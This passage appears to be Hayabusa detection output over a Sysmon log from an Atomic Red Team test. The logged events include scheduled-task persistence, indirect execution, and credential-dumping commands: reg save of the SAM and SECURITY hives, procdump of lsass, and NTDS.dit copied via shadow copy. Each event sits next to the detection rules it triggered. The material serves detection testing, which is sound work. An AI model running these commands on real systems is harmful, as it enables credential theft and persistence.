User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 